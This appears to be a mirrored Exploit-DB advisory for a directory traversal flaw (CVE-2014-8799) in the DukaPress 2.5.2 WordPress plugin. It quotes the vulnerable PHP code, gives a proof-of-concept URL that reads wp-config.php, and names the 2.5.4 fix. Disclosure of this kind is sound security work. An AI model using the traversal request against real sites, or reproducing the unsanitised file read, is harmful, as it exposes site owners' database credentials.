Skip to content
cyberexploits
webappphptext

WordPress Plugin DukaPress 2.5.2 - Directory Traversal

WordPress Plugin DukaPress 2.5.2 - Directory Traversal

Publié le 2014-11-24

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/php/webapps/35346.txt7eac4c3a
raw
# Exploit Title: DukaPress 2.5.2 Path Traversal

# Date: 27-10-2014

# Exploit Author: Kacper Szurek - http://security.szurek.pl

# Software Link: https://downloads.wordpress.org/plugin/dukapress.2.5.2.zip

# Category: webapps

# CVE: CVE-2014-8799

  

1. Description



dp_img_resize() returns $_REQUEST['src'] if $_REQUEST['w'] and $_REQUEST['h'] doesn't exist.



File: dukapress\lib\dp_image.php

if (!function_exists('add_action')) {

    require_once('../../../../wp-load.php');

}



echo file_get_contents(dp_img_resize('', $_REQUEST['src'],$_REQUEST['w'], $_REQUEST['h']));

 

http://security.szurek.pl/dukapress-252-path-traversal.html

  

2. Proof of Concept

  

http://wordpress-url/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php

  

3. Solution:

  

Update to version 2.5.4



https://downloads.wordpress.org/plugin/dukapress.2.5.4.zip

https://plugins.trac.wordpress.org/changeset/1024640/dukapress
Voir sur GitHub